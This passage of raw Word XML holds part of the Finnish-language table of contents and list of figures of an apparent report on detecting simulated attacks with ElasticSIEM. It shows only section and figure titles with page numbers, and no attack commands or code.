          <w:t>3.3</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>ElasticSIEM</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1430395791 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="077794AE" w14:textId="1C435D30">
      <w:pPr>
        <w:pStyle w:val="Sisluet3"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc955080968">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.3.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Kalastelu: Haitallinen liite</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc955080968 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="118F8871" w14:textId="32003799">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919834941">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.3.2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Artefaktien piilottaminen</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc919834941 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="4A72177D" w14:textId="151764CB">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983488252">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.3.3</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Etäkäytön kaappaus</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc983488252 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="15FBF858" w14:textId="127ED429">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322904999">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.3.4</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>LLMNR saastuttaminen Inveigh työkalulla</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1322904999 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="7E730AF3" w14:textId="6A07ED3D">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457882055">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.3.5</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Ohjelmien suorittaminen allekirjoitetun skriptin välityksellä</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1457882055 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="1E781B51" w14:textId="173D8C32">
      <w:pPr>
        <w:pStyle w:val="Sisluet1"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="48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1460404387">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Yhteenveto</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1460404387 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="00BCC2D4" w14:textId="7F91653A">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1740597137">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>4.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Tulosten analysointi ja johtopäätköset</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1740597137 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="648AEEAB" w14:textId="55D0B7F7">
      <w:pPr>
        <w:pStyle w:val="Sisluet3"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="120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2045206763">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>4.1.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Johtopäätökset</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc2045206763 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="40F3040B" w14:textId="26879FA0">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1503650283">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>4.2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Työkalujen tehokkuus ja ominaisuudet</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1503650283 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="45EEEAD8" w14:textId="6A1B3231">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>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783109012">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>4.3</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Harjoituksen opit ja miten tästä eteenpäin</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc783109012 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="79B439EE" w14:textId="054DF233">
      <w:pPr>
        <w:pStyle w:val="Sisluet1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86267267">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Lähteet</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc86267267 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidP="00CA77C5" w:rsidRDefault="00F131CE" w14:paraId="651F49EB" w14:textId="2E06F5D0">
      <w:pPr>
        <w:pStyle w:val="Sisllysluettelootsikko"/>
      </w:pPr>
      <w:r w:rsidR="00016973">
        <w:rPr/>
        <w:t>Kuviot</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Kuvio" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="7C63A617" w14:textId="00B94246">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18">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 1. VLE</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971518 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="15E7CBE0" w14:textId="7606097E">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19">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 2. Nmap</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971519 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="78850C3D" w14:textId="6FE26A7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0">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 3. Hälytykset nmapista</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971520 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="23338562" w14:textId="0F420814">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1">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 4. mssql</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971521 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="0A90D8F2" w14:textId="1A6D97F7">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2">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 5. Brute force -hyökkäykestä aiheutuneet hälytykset</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971522 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="71DF754E" w14:textId="4DFC82E5">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3">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 6. Yksittäinen hälytys</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971523 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="24A436C9" w14:textId="74063917">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4">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 7. Tiedostonsiirtokomento</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971524 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="4AD683D4" w14:textId="126BF638">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5">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 8.Alert_malware</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971525 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="228C2872" w14:textId="4C69FF1C">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6">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 9. PowerShell-komento</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971526 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
